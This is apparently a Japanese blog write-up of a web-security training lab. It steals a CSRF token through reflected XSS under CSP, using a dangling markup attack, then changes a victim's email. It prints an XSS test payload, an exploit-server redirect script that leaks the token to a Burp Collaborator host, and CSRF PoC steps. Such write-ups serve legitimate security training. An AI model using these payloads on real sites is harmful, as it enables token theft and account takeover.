shikata ga nai

Private? There is no such things.

Reflected XSS protected by CSP, with dangling markup attack

Hello there, ('ω')ノ

 

CSPで保護された反射型XSS、ぶら下がりマークアップ攻撃を。

このラボは、CSPを使用してXSS攻撃を軽減して。

CSRFトークンを盗んで、別ユーザのメールアドレスを変更する。

ダングリングマークアップ攻撃を実行せよと。

 

まずは、ログインして。

 

f:id:ThisIsOne:20210506084324p:plain

 

メールアドレスを変更して。

 

f:id:ThisIsOne:20210506084344p:plain

 

リクエストをリピータへ。

 

f:id:ThisIsOne:20210506084417p:plain

 

下記のペイロードを挿入して動作とCSPの確認を。

 "><img src=x onerror=alert(1)>

 

f:id:ThisIsOne:20210506084730p:plain

 

Followして。

 

f:id:ThisIsOne:20210506084752p:plain

 

まずは、コラボレータを起動してURLをコピーして。

 

f:id:ThisIsOne:20210506084918p:plain

 

下記のスクリプトをエクスプロイトサーバへ。

<script>
location='https://ac1c1fe01ebe941f800b402000ea001e.web-security-academy.net/my-account?email=%22%3E%3Ctable%20background=%27//pohuavjwrcun1wulypj3mism4da4yt.burpcollaborator.net?';
</script>

 

f:id:ThisIsOne:20210506085047p:plain

 

Storeして、Viewでページを確認してからエクスプロイトサーバでDeliverを。

 

f:id:ThisIsOne:20210506085317p:plain

 

コラボレータでHTTPをキャッチしてcsrfをデコードへ。

 

f:id:ThisIsOne:20210506085415p:plain

 

下記のようにデコードして。

 g4NZqAM51E3PljT20VEFM9DLRF4QNLgu

 

f:id:ThisIsOne:20210506085457p:plain

 

ターゲットユーザがラボのWebサイトにログインしたままで。

悪意のあるスクリプトを含むWebサイトにアクセスすると。

 

ブラウザは、CSRFトークンを含む要求を悪意のあるWebサイトに送信して。

その後、このトークンを盗むことができるので。

 

まずは、インターセプトをオンにしてからでメールアドレスの変更を。

 

f:id:ThisIsOne:20210506085709p:plain

 

右クリックでCSRF PoCを。

リクエストはDropしてからインターセプトをオフにしておいて。

 

f:id:ThisIsOne:20210506085754p:plain

 

Optionをチェックして。CSRFトークンを書き換えて。

確認のためにメールアドレスも変更しておいてからRegenerateを。

HTMLをコピーして。

 

f:id:ThisIsOne:20210506085927p:plain

 

コピーしたHTMLを貼り付けて、SaveしてDeliverすると。

 

f:id:ThisIsOne:20210506090119p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210506091054p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain